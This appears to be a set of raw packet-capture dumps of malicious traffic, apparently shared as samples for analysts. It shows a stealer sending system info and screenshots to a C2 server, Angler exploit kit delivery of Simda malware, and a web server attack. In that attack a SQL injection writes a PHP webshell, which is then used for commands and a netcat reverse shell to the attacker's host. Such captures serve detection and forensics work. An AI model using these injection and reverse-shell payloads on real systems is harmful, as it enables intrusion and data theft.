User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: 31.210.171.200
Connection: Keep-Alive

2019-05-29 23:40:03.662144 IP 10.1.10.162.49189 > 31.210.171.200.80: Flags [P.], seq 297:591, ack 917003, win 65335, length 294: HTTP: GET /gate/libs.zip HTTP/1.1
E..N..@….V
.
……%.P.M..V…P..7B…GET /gate/libs.zip HTTP/1.1
Accept: /
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: 31.210.171.200
Connection: Keep-Alive

2019-05-29 23:40:05.273384 IP 31.210.171.200.80 > 10.1.10.162.49189: Flags [P.], seq 3744744:3745578, ack 591, win 245, length 834: HTTP
E .j..@.4…….
.
..P.%V...M..P…8P……..znN..i..(..8G….$……. …G.).api-ms-win-core-file-l2-1-0.dll . ………d0.^....R^%.....R^%....PK...........znNB.p.a(..8G..!.$....... ...Z.*.api-ms-win-core-handle-l1-1-0.dll . .........nW.^…..^%……^%….PK………..znN ..q.)..8G….$……. ….?.api-ms-win-core-heap-l1-1-0.dll
. ………nW.^...G._%....G._%....PK...........znN...##'...E..&.$....... ...:i*.api-ms-win-core-interlocked-l1-1-0.dll . ..........~.^…y.%….y.%….PK………..znNL…J)..8I..(.$……. …...api-ms-win-core-libraryloader-l1-1-0.dll . ……….~.^.....%……%....PK...........znN.....+..8Q..'.$....... ...1.*.api-ms-win-core-localization-l1-2-0.dll . ............^….N%.....N%….PK………..znN1….)..8I..!.$……. …?..api-ms-win-core-memory-l1-1-0.dll
. …………^.....%……`%….PK……:.:.t…..+…
2019-05-29 23:40:14.608543 IP 10.1.10.162.49188 > 31.210.171.200.80: Flags [P.], seq 345:689, ack 567, win 16283, length 344: HTTP: POST /file_handler/file.php?hash=fd6a281324a57b6258a807e86a258957a8bf4bde&js=21b42a021c078f99045bddc55087e5af4bfd64bc&callback=http://31.210.171.200/gate HTTP/1.1
E….a@…..
.
……$.P>..p.e..P.?…..POST /file_handler/file.php?hash=fd6a281324a57b6258a807e86a258957a8bf4bde&js=21b42a021c078f99045bddc55087e5af4bfd64bc&callback=http://31.210.171.200/gate HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: multipart/form-data, boundary=Jfbvjwj3489078yuyetu
Content-Length: 63918
Host: 31.210.171.200

2019-05-29 23:40:15.012041 IP 10.1.10.162.49188 > 31.210.171.200.80: Flags [P.], seq 63469:64607, ack 567, win 16283, length 1138: HTTP
E…..@…..
.
……$.P>….e..P.?.f…….8..b..Hl
.giT…BX:..D..7Y%3.4
…~$Z.8….K.u6.T………H….0}………….](..J.wK..b.Is…..@..}……….}o…..h..j..HP.JT.”..’B.A_u.hn”..S…;..R;..!.
-.fual[.MZ.L.qn.W.s.9.t=….C..S.=…@.M…fW4,w..4y.d-…/…….T..bf.2M…….eWoh…,./….;?+.S.PP.C...I.........K....[ RM.q. jTx.x... 8:W<!.+..j.4..(....W...."..O.......zD^.].....[..i..F.=.B..0.1.>..1..'...J.........0V..5.. c..._..3..>_.../ ..+N..X...v.H..R.....{I,..u..Z.^..\.E.$. ~...[5. ^o...P.bY.h.......w...$+.~t..57.0g...e.V%Q.R..M3..fm-1...]o+.x.F....E....W.......R.W.(..|.......<b.8..}7..:.>...srt6.r.....B.. U?V.$y.{..{..(..7.....r&%..u)D.V.C]..." ..y...&]7......@.%t&.{W. UZZ..#.....K.N..N@.;....o{...W.yl..E>.xT.D.^._...'9.p.Qw.?.....1V=..M...{W.vr)Tg.....Sp...g.....+."..............e...U...{...D0iZ...,.... ...].G2.......K …#….E.l.]..UN.v)……W gt.c..f}.Q….]..)6.…]..0………Fi.{ 4a&K……..6#…….nK.’.;……U..Z……e.|.Yb…’….z…..GVRI.F.8…PK………….NF.i……….. ……. …….System Info.txtUT….4.\PK………….N….Z…….
. ……. …….screen.pngUT….4.\PK…………..n…..
–Jfbvjwj3489078yuyetu–
2019-05-29 23:40:15.573069 IP 31.210.171.200.80 > 10.1.10.162.49188: Flags [P.], seq 567:793, ack 64607, win 1252, length 226: HTTP: HTTP/1.1 200 OK
E .
..@.4…….
.
..P.$.e..>..vP….v..HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Thu, 30 May 2019 03:40:15 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *

d
true”success”
0

Angler Exploit Kit EK Deliver Simda Malware Banking Trojan PCAP file download traffic sample

2015-03-27 11:14:44.276370 IP 192.168.122.34.49193 > 188.138.68.234.80: Flags [.], ack 1, win 256, length 0
E..(.A@….O..z”..D..).P.Cy…..P………….
2015-03-27 11:14:44.283482 IP 192.168.122.34.49193 > 188.138.68.234.80: Flags [P.], seq 1:356, ack 1, win 256, length 355: HTTP: GET /closers_retrenchment_delineation/6715645798 HTTP/1.1
E….K@…….z”..D..).P.Cy…..P….;..GET /closers_retrenchment_delineation/6715645798 HTTP/1.1
Accept: text/html, application/xhtml+xml, /
Referer: [[[[[[[[[ redacted ]]]]]]]]]]
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Accept-Encoding: gzip, deflate
Host: kiyoshi.noahsbootandshoerepair.com
Connection: Keep-Alive

2015-03-27 11:14:44.539699 IP 188.138.68.234.80 > 192.168.122.34.49193: Flags [.], ack 356, win 123, length 0

2015-03-27 11:14:46.115369 IP 192.168.122.34.49193 > 188.138.68.234.80: Flags [.], ack 95637, win 256, length 0
E..(..@…….z”..D..).P.C{…5 P…y………
2015-03-27 11:14:47.983190 IP 192.168.122.34.49193 > 188.138.68.234.80: Flags [P.], seq 356:767, ack 95637, win 256, length 411: HTTP: GET /6wPrlh_lsbc-9hRJiDNmuto00SCpbQ66ZWFxssA_s5dM2-R_ HTTP/1.1
E…..@…….z”..D..).P.C{…5 P…Ba..GET /6wPrlh_lsbc-9hRJiDNmuto00SCpbQ66ZWFxssA_s5dM2-R_ HTTP/1.1
Accept: /
Accept-Language: en-US
Referer: http://kiyoshi.noahsbootandshoerepair.com/closers_retrenchment_delineation/6715645798
x-flash-version: 13,0,0,182
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Host: kiyoshi.noahsbootandshoerepair.com
Connection: Keep-Alive


2015-03-27 11:14:48.180800 IP 192.168.122.34.49206 > 188.138.68.234.80: Flags [.], ack 1, win 256, length 0
E..(..@….v..z”..D..6.P…5..BDP….”……..
2015-03-27 11:14:48.181788 IP 192.168.122.34.49206 > 188.138.68.234.80: Flags [P.], seq 1:133, ack 1, win 256, length 132: HTTP: GET /VpP2cGkL0OoIlocWqM8mNHcJ7wyQxQrHbU6TN_eDT6KG75FD HTTP/1.1
E…..@…….z”..D..6.P…5..BDP…….GET /VpP2cGkL0OoIlocWqM8mNHcJ7wyQxQrHbU6TN_eDT6KG75FD HTTP/1.1
Connection: Keep-Alive
Host: kiyoshi.noahsbootandshoerepair.com

2015-03-27 11:14:48.207298 IP 188.138.68.234.80 > 192.168.122.34.49193: Flags [.], seq 95637:97004, ack 767, win 131, length 1367: HTTP: HTTP/1.1 200 OK
E….&@.2.X…D…z”.P.)..5 .C|.P…e…HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Fri, 27 Mar 2015 15:14:48 GMT
Content-Type: application/x-shockwave-flash

Content-Length: 52272

2015-03-27 11:14:52.508197 IP 192.168.122.34.49219 > 208.113.226.171.80: Flags [.], ack 1, win 256, length 0
E..(..@….[..z”.q…C.P=.,.u..RP….a……..
2015-03-27 11:14:52.509414 IP 192.168.122.34.49219 > 208.113.226.171.80: Flags [P.], seq 1:101, ack 1, win 256, length 100: HTTP: POST /timezone/0/0 HTTP/1.1
E…..@…….z”.q…C.P=.,.u..RP…I#..POST /timezone/0/0 HTTP/1.1
Connection: Keep-Alive
Content-Length: 0
Host: www.earthtools.org

2015-03-27 11:14:52.845296 IP 208.113.226.171.80 > 192.168.122.34.49219: Flags [.], ack 101, win 115, length 0
E..(7E@./.&..q….z”.P.Cu..R=.,iP..s….
2015-03-27 11:14:52.845577 IP 208.113.226.171.80 > 192.168.122.34.49219: Flags [P.], seq 1:696, ack 101, win 115, length 695: HTTP: HTTP/1.1 200 OK
E…7F@./.#..q….z”.P.Cu..R=.,iP..s….HTTP/1.1 200 OK

Date: Fri, 27 Mar 2015 15:14:52 GMT

2015-03-27 11:14:53.309622 IP 192.168.122.34.49220 > 23.37.56.11.80: Flags [.], ack 1, win 256, length 0
E..(..@…k…z”.%8..D.P/……SP…O………
2015-03-27 11:14:53.310410 IP 192.168.122.34.49220 > 23.37.56.11.80: Flags [P.], seq 1:126, ack 1, win 256, length 125: HTTP: POST /stats/eurofxref/eurofxref-hist-90d.xml HTTP/1.1
E…..@…j…z”.%8..D.P/……SP…X…POST /stats/eurofxref/eurofxref-hist-90d.xml HTTP/1.1
Connection: Keep-Alive
Content-Length: 0
Host: www.ecb.europa.eu

2015-03-27 11:14:53.478277 IP 23.37.56.11.80 > 192.168.122.34.49220: Flags [.], ack 126, win 457, length 0
E..(..@.9..F.%8…z”.P.D…S/…P…N…
2015-03-27 11:14:53.578255 IP 23.37.56.11.80 > 192.168.122.34.49220: Flags [.], seq 1:1368, ack 126, win 457, length 1367: HTTP: HTTP/1.1 200 OK
E…..@.9….%8…z”.P.D…S/…P…f…HTTP/1.1 200 OK

Server: Apache/2.2.3 (Linux/SUSE)

2015-03-27 11:14:58.577462 IP 192.168.122.34.49228 > 85.25.104.159.80: Flags [.], ack 1, win 256, length 0
E..(..@….{..z”U.h..L.P.B.~6t..P…Ik……..
2015-03-27 11:14:58.578833 IP 192.168.122.34.49228 > 85.25.104.159.80: Flags [P.], seq 1:136, ack 1, win 256, length 135: HTTP: POST / HTTP/1.1
E…..@…….z”U.h..L.P.B.~6t..P….Y..POST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Length: 216
Host: wrzvmyfzckdgcij4.com

2015-03-27 11:14:58.579133 IP 192.168.122.34.49228 > 85.25.104.159.80: Flags [P.], seq 136:352, ack 1, win 256, length 216: HTTP
E…..@…….z”U.h..L.P.B..6t..P…k…SNE1dax2kTrCO0/dykZ+x8JvoeshsqxF8Bud4at1aDiBWU9qB6+uhOMFH98SexCc+vJywoAb8HQv8VDbLgLc25bZvceJUzuvnAqW58q0Pwbl5Z2luX50C3YR+Ef3gJUBFHY5k6LtQ0Uxou9+4TQEZzORJaqZn7WT9wqKE1eM8LYMnmPmnpobOT6M3r+PF5oJnTmoAQ1EthyxMm7LjPYf2g==

2015-03-27 11:14:58.778906 IP 85.25.104.159.80 > 192.168.122.34.49228: Flags [.], ack 136, win 123, length 0

2015-03-27 11:15:00.349286 IP 192.168.122.34.49230 > 85.25.104.159.80: Flags [.], ack 1, win 256, length 0
E..(..@….@..z”U.h..N.P…H.1..P….i……..
2015-03-27 11:15:00.350212 IP 192.168.122.34.49230 > 85.25.104.159.80: Flags [P.], seq 1:136, ack 1, win 256, length 135: HTTP: POST / HTTP/1.1
E…..@…….z”U.h..N.P…H.1..P….R..POST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Length: 172
Host: wrzvmyfzckdgcij4.com

2015-03-27 11:15:00.350542 IP 192.168.122.34.49230 > 85.25.104.159.80: Flags [P.], seq 136:308, ack 1, win 256, length 172: HTTP
E…..@…….z”U.h..N.P…..1..P…….YD4viggOIh++07v2Um1gIx11St/8XC8saF5uX0YI4AMVOHQ25cUjc+t23u3BZI27fiaqpkXY6wVteS6MqFLJlvHwM6fGGZVitbFgc8uerOJBrGG5iaFm5jNsDn5NWX3yyd0SwE47HcjkQ1DdnT7on0O8tT20+FuDVEr4npZm0eE=

2015-03-27 11:15:00.643584 IP 85.25.104.159.80 > 192.168.122.34.49230: Flags [.], ack 136, win 123, length 0

2015-03-27 11:15:03.031960 IP 192.168.122.34.49230 > 85.25.104.159.80: Flags [.], ack 513599, win 1368, length 0
E..(..@….K..z”U.h..N.P…{.9..P..X……….
2015-03-27 11:15:03.227353 IP 192.168.122.34.49230 > 85.25.104.159.80: Flags [P.], seq 308:443, ack 513599, win 1368, length 135: HTTP: POST / HTTP/1.1
E…..@…….z”U.h..N.P…{.9..P..X….POST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Length: 256
Host: wrzvmyfzckdgcij4.com

2015-03-27 11:15:03.227511 IP 192.168.122.34.49230 > 85.25.104.159.80: Flags [P.], seq 443:699, ack 513599, win 1368, length 256: HTTP
E..(..@….I..z”U.h..N.P…..9..P..X….GpbZQGaQgmfu/Eh0mvebAJPknXzYE1Vhzceud0DQnHPICCkYG2flJ1aMWtq5BMcqrPr7wo7Fr53uEdowJXndCecd5Aj+eFv4Wsy43MaZDqFqB2/ld1bLXKa8U5EUlr8hLOsU8Q/e3pN/wf2SWbmmm5Rci6Hw1izzlJ/rY8zpaDl3n3E2sBtF6EX0+M1Eu4cE82G4ZcE3qY2Ld94kApgQVjW/Wu5p26YOwUZB2mTcGnM0AT0qyJzKE77lTaBJkHH1

2015-03-27 11:15:03.427513 IP 85.25.104.159.80 > 192.168.122.34.49230: Flags [.], ack 443, win 140, length 0

2015-03-27 11:15:09.727441 IP 192.168.122.34.49241 > 188.138.25.46.80: Flags [.], ack 1, win 256, length 0
E..(..@…….z”…..Y.P…Gv.”.P………….
2015-03-27 11:15:09.727832 IP 192.168.122.34.49241 > 188.138.25.46.80: Flags [P.], seq 1:407, ack 1, win 256, length 406: HTTP: POST /news.php HTTP/1.0
E…..@…….z”…..Y.P…Gv.”.P…….POST /news.php HTTP/1.0
Host: fasion.arunthati.co.uk
Accept: /
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: 698
Content-Type: application/octet-stream

2015-03-27 11:15:21.224812 IP 192.168.122.34.49230 > 85.25.104.159.80: Flags [P.], seq 834:1562, ack 742017, win 2002, length 728: HTTP
E…..@…….z”U.h..N.P…..=.GP…….GMXiXd49B5iwJApbnju5S7TSL4CBU0EaU8l0WQKCbWg7hAyhzQilFMKgOwfKOy6G0/g37ipDdpYCEc8PJiUaJv+IFR1a1HXiPDWzFglXeTnP7pjbGUKS9K0PXA1Uo1UZW6VEoKRn+ZuxvM3BRRdgzEM5CkIH42ZpivDhVkCJ4P6Fqp+v1Uz2f9aZgRrnxA62Gds9itsbdKPYGT5K1fBQ6Wj0DQpkzb8c+eC00w5gKkNTQFDdq12qhpnydU5RL3j05yepKyu42ZnRDyd8UL8nKYIX6cvW5XczXGHFk1egZtjW++YmsVW0A4c5mpPT+PRLb9keLQRqWKcLW+RCozgBstim7ha1Uxrer1RcT/FG+UUrzkybT57eDfTeZQJLRsti4ahtlgyCqMDCmACszLGlxrcK0xwFAoZ40HHqwL561H815gEsuwcrzrE/C1t2quC9AHtRWPE4jgy8VMFRRJ1EQzjBxNCayGsFGb+V/qvImKrK4hic42Q+32icspNkz36X6+bgARY0aQhQkru0lGh6e88mNvt+EIpim5UJDxgGHDpdT5KPK8ZNEC66aHNcieJgnUnXspdClizeGvuZ7TUCgWey/VOnkedLfJQrIgWunOqVTEQzpJZrBH1px1fajjriHVCy7aj+KcF2C1MLibl1xptPqfKNinoKDEG3SPjZiHkj5rwFy+bP6AcEGER4/TYvrUovM6nBajbHIQF3C7Iezw==

2015-03-27 11:15:21.368855 IP 85.25.104.159.80 > 192.168.122.34.49230: Flags [.], ack 834, win 156, length 0

2015-03-27 11:18:03.853669 IP 192.168.122.34.49244 > 78.46.107.218.80: Flags [.], ack 1, win 256, length 0
E..( ‘@…….z”N.k…P..;x.R..P…)………
2015-03-27 11:18:03.854165 IP 192.168.122.34.49244 > 78.46.107.218.80: Flags [P.], seq 1:178, ack 1, win 256, length 177: HTTP: GET /ads.php?sid=1923 HTTP/1.1
E… (@….#..z”N.k…P..;x.R..P….x..GET /ads.php?sid=1923 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Win64; x64; Trident/6.0)
Host: geeksdronesfamily.net

2015-03-27 11:18:04.090363 IP 85.25.107.67.80 > 192.168.122.34.49245: Flags [S.], seq 307298518, ack 567770301, win 29200, options [mss 1367,nop,nop,sackOK,nop,wscale 9], length 0
E..4
.@.0.D.U.kC..z”.P.].Q..!.|…r……..W…….
2015-03-27 11:18:04.090742 IP 192.168.122.34.49245 > 85.25.107.67.80: Flags [.], ack 1, win 256, length 0
E..( )@…….z”U.kC.].P!.|..Q..P…AC……..
2015-03-27 11:18:04.091262 IP 192.168.122.34.49245 > 85.25.107.67.80: Flags [P.], seq 1:174, ack 1, win 256, length 173: HTTP: GET /ads.php?sid=1923 HTTP/1.1
E… *@…….z”U.kC.].P!.|..Q..P…….GET /ads.php?sid=1923 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Win64; x64; Trident/6.0)
Host: sandsofafrica.net

2015-03-27 11:18:04.218709 IP 162.244.34.133.80 > 192.168.122.34.49246: Flags [S.], seq 2988324121, ack 1071872369, win 29200, options [mss 1367,nop,nop,sackOK,nop,wscale 9], length 0
E..4
.@.3.<…”…z”.P.^..5.?.yq..r……..W……. 2015-03-27 11:18:04.219113 IP 192.168.122.34.49246 > 162.244.34.133.80: Flags [.], ack 1, win 256, length 0
E..( +@….`..z”..”..^.P?.yq..5.P…MT……..
2015-03-27 11:18:04.219642 IP 192.168.122.34.49246 > 162.244.34.133.80: Flags [P.], seq 1:171, ack 1, win 256, length 170: HTTP: GET /ads.php?sid=1923 HTTP/1.1
E… ,@…….z”..”..^.P?.yq..5.P…….GET /ads.php?sid=1923 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Win64; x64; Trident/6.0)
Host: koreandust.com

2015-03-27 11:18:32.826046 IP 192.168.122.34.49263 > 136.243.241.27.80: Flags [P.], seq 1:469, ack 1, win 64249, length 468: HTTP: GET /bd18f8e13790967b20038d71ed0b3f70 HTTP/1.1
E… .@…:n..z”…..o.P..N..<1.P….w..GET /bd18f8e13790967b20038d71ed0b3f70 HTTP/1.1
Accept: /
Accept-Language: en-US
Referer: http://f5.dbac60.dcee2.0d.30.d7f0a.e311eaa.810.yy0w6j4j.changesmoves.in/?22504744544b4d4e4356434c5643564b0c414d4f
x-flash-version: 13,0,0,182
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Host: f5.dbac60.dcee2.0d.30.d7f0a.e311eaa.810.yy0w6j4j.changesmoves.in
Connection: Keep-Alive


2015-03-27 11:18:33.183843 IP 192.168.122.34.49265 > 78.46.107.218.80: Flags [.], ack 1, win 256, length 0
E..( .@….>..z”N.k..q.P7AB.ZEr.P………….
2015-03-27 11:18:33.184137 IP 192.168.122.34.49265 > 78.46.107.218.80: Flags [P.], seq 1:178, ack 1, win 256, length 177: HTTP: GET /ads.php?sid=1923 HTTP/1.1
E… .@…….z”N.k..q.P7AB.ZEr.P…)…GET /ads.php?sid=1923 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Win64; x64; Trident/6.0)
Host: geeksdronesfamily.net

2015-03-27 11:18:33.217857 IP 192.168.122.34.52660 > 224.0.0.252.5355: UDP, length 22
E..2 ……4..z”…………^…………wpad…..
2015-03-27 11:18:33.280227 IP 136.243.241.27.80 > 192.168.122.34.49264: Flags [.], ack 552, win 15400, length 0
E..(..@.3………z”.P.p.%..}X-P.<(.n..

2015-03-27 11:18:33.280608 IP 136.243.241.27.80 > 192.168.122.34.49263: Flags [.], seq 12518:13885, ack 469, win 15544, length 1367: HTTP

2015-03-27 11:18:35.340582 IP 192.168.122.34.49266 > 162.244.34.133.80: Flags [.], ack 1, win 256, length 0
E..( .@…….z”..”..r.P…..%..P………….
2015-03-27 11:18:35.340943 IP 192.168.122.34.49266 > 162.244.34.133.80: Flags [P.], seq 1:326, ack 1, win 256, length 325: HTTP: GET /r.php?key=934b952b5596d97433bf5cd2a08a1dd3 HTTP/1.1
E..m .@….v..z”..”..r.P…..%..P…g…GET /r.php?key=934b952b5596d97433bf5cd2a08a1dd3 HTTP/1.1
Accept: /
Referer: http://newblackfridayads.com/search.php
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: koreandust.com
Connection: Keep-Alive

Webshell shell.php Command Access SSH Server PCAP Analysis File Download

2018-10-14 12:34:34.199552 IP 192.0.2.50.45756 > 10.1.2.100.80: Flags [P.], seq 1:334, ack 1, win 229, options [nop,nop,TS val 769026432 ecr 738855], length 333: HTTP: GET /edit_type.php?type_id=-5%20union%20select%20%22%3C?php%20echo%20shell_exec($_GET[‘cmd’]);?%3E%22%20into%20outfile%22/var/www/docs/shell.php%22–%20 HTTP/1.1
E…XA@.?……2
..d…P…f{J.I…..F…..
-.i…F’GET /edit_type.php?type_id=-5%20union%20select%20%22%3C?php%20echo%20shell_exec($_GET[‘cmd’]);?%3E%22%20into%20outfile%22/var/www/docs/shell.php%22–%20 HTTP/1.1
Host: 10.1.2.100
Connection: keep-alive
Cookie: PHPSESSID=stlgkh7eb3hq4ctmbi80u0akt0
Accept-Encoding: gzip, deflate
Accept: /
User-Agent: python-requests/2.9.1

2018-10-14 12:34:34.199573 IP 10.1.2.100.80 > 192.0.2.50.45756: Flags [.], ack 334, win 1944, options [nop,nop,TS val 738856 ecr 769026432], length 0
E..4.a@.@…
..d…2.P..{J.I……………
..F(-.i.
2018-10-14 12:34:34.202294 IP 10.1.2.100.80 > 192.0.2.50.45756: Flags [P.], seq 1:996, ack 334, win 1944, options [nop,nop,TS val 738856 ecr 769026432], length 995: HTTP: HTTP/1.1 200 OK
E….b@.@.|.
..d…2.P..{J.I……………
..F(-.i.HTTP/1.1 200 OK
Date: Sun, 14 Oct 2018 16:34:34 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 586
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-vType: text/html

2018-10-14 12:34:34.210976 IP 192.0.2.50.45756 > 10.1.2.100.80: Flags [P.], seq 334:545, ack 996, win 244, options [nop,nop,TS val 769026434 ecr 738856], length 211: HTTP: GET /docs/shell.php?cmd=whoami HTTP/1.1
E…XC@.?……2
..d…P….{J.,………..
-.i…F(GET /docs/shell.php?cmd=whoami HTTP/1.1
Host: 10.1.2.100
Connection: keep-alive
Cookie: PHPSESSID=stlgkh7eb3hq4ctmbi80u0akt0
Accept-Encoding: gzip, deflate
Accept: /
User-Agent: python-requests/2.9.1

2018-10-14 12:34:34.220266 IP 10.1.2.100.80 > 192.0.2.50.45756: Flags [P.], seq 996:1295, ack 545, win 2078, options [nop,nop,TS val 738861 ecr 769026434], length 299: HTTP: HTTP/1.1 200 OK
E.._.c@.@…
..d…2.P..{J.,……………
..F–.i.HTTP/1.1 200 OK
Date: Sun, 14 Oct 2018 16:34:34 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 29
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html

……….+//.MI,I…..@f …
2018-10-14 12:34:34.263625 IP 192.0.2.50.45756 > 10.1.2.100.80: Flags [.], ack 1295, win 260, options [nop,nop,TS val 769026448 ecr 738861], length 0
E..4XD@.?……2
..d…P….{J.W…..S…..
-.i…F-
2018-10-14 12:34:37.227759 IP 192.0.2.50.45756 > 10.1.2.100.80: Flags [P.], seq 545:772, ack 1295, win 260, options [nop,nop,TS val 769027189 ecr 738861], length 227: HTTP: GET /docs/shell.php?cmd=cat%20/etc/lsb-release HTTP/1.1
E…XE@.?……2
..d…P….{J.W….6……
-.lu..F-GET /docs/shell.php?cmd=cat%20/etc/lsb-release HTTP/1.1
Host: 10.1.2.100
Connection: keep-alive
Cookie: PHPSESSID=stlgkh7eb3hq4ctmbi80u0akt0
Accept-Encoding: gzip, deflate
Accept: /
User-Agent: python-requests/2.9.1

2018-10-14 12:34:37.233154 IP 10.1.2.100.80 > 192.0.2.50.45756: Flags [P.], seq 1295:1662, ack 772, win 2212, options [nop,nop,TS val 739614 ecr 769027189], length 367: HTTP: HTTP/1.1 200 OK
E….d@.@..Y
..d…2.P..{J.W…i…..,…..
..I.-.luHTTP/1.1 200 OK
Date: Sun, 14 Oct 2018 16:34:37 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 97
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html

2018-10-14 12:34:52.294903 IP 192.0.2.50.45756 > 10.1.2.100.80: Flags [P.], seq 1657:1941, ack 2981, win 337, options [nop,nop,TS val 769030955 ecr 742627], length 284: HTTP: GET /docs/shell.php?cmd=/bin/bash%200%3C/var/tmp/pipe%20%7C%
20nc%20192.0.2.50%20443%201%3E/var/tmp/pipe HTTP/1.1
E..PXO@.?……2
..d…P….{J…..Q…….
-.{+..T.GET /docs/shell.php?cmd=/bin/bash%200%3C/var/tmp/pipe%20%7C%20nc%20192.0.2.50%20443%201%3E/var/tmp/pipe HTTP/1.1
Host: 10.1.2.100
Connection: keep-alive
Cookie: PHPSESSID=stlgkh7eb3hq4ctmbi80u0akt0
Accept-Encoding: gzip, deflate
Accept: /
User-Agent: python-requests/2.9.1

2018-10-14 12:34:52.307291 IP 10.1.2.100.45298 > 192.0.2.50.443: Flags [S], seq 3484359733, win 14600, options [mss 1460,sackOK,TS val 743383 ecr 0,nop,wscale 3], length 0
E.. 10.1.2.100.45298: Flags [R.], seq 0, ack 3484359734, win 0, length 0
E..(..@.?..H…2
..d………..6P…B………
2018-10-14 12:34:52.309383 IP 10.1.2.100.80 > 192.0.2.50.45756: Flags [P.], seq 2981:3271, ack 1941, win 2882, options [nop,nop,TS val 743383 ecr 769030955], length 290: HTTP: HTTP/1.1 200 OK
E..V.i@.@…
..d…2.P..{J………B…….
..W.-.{+HTTP/1.1 200 OK
Date: Sun, 14 Oct 2018 16:34:52 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: text/html

2018-10-14 12:54:51.821265 IP 10.1.2.100.22 > 10.1.3.100.49220: Flags [P.], seq 1:40, ack 1, win 1825, length 39
E..O..@.@.+5
..d
..d…D….g…P..!….SSH-2.0-OpenSSH_5.9p1 Debian-5ubuntu1

2018-10-14 12:54:51.827631 IP 10.1.3.100.49220 > 10.1.2.100.22: Flags [P.], seq 1:497, ack 40, win 256, length 496
E…#.@…..
..d
..d.D..g…….P….5..SSH-2.0-PuTTY_Release_0.70
…L…U.4|..m..u~……..curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,rsa2048-sha256,rsa1024-sha1,diffie-hellman-group1-sha1…Wssh-ed25519,ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-rsa,ssh-dss….aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-ctr,aes192-cbc,aes128-ctr,aes128-cbc,chacha20-poly
2018-10-14 12:54:51.827650 IP 10.1.3.100.49220 > 10.1.2.100.22: Flags [P.], seq 497:1133, ack 40, win 256, length 636
E…#.@…..
..d
..d.D..g…….P…s…1305@openssh.com,blowfish-ctr,blowfish-cbc,3des-ctr,3des-cbc,arcfour256,arcfour128….aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-ctr,aes192-cbc,aes128-ctr,aes128-cbc,chacha20-poly1305@openssh.com,blowfish-ctr,blowfish-cbc,3des-ctr,3des-cbc,arcfour256,arcfour128….hmac-sha2-256,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-etm@openssh.com….hmac-sha2-256,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-etm@openssh.com… none,zlib… none,zlib……………..
2018-10-14 12:54:51.827709 IP 10.1.2.100.22 > 10.1.3.100.49220: Flags [.], ack 497, win 1959, length 0
E..(..@.@.+[
..d
..d…D….g…P…….
2018-10-14 12:54:51.827744 IP 10.1.2.100.22 > 10.1.3.100.49220: Flags [.], ack 1133, win 2118, length 0
E..(..@.@.+Z
..d
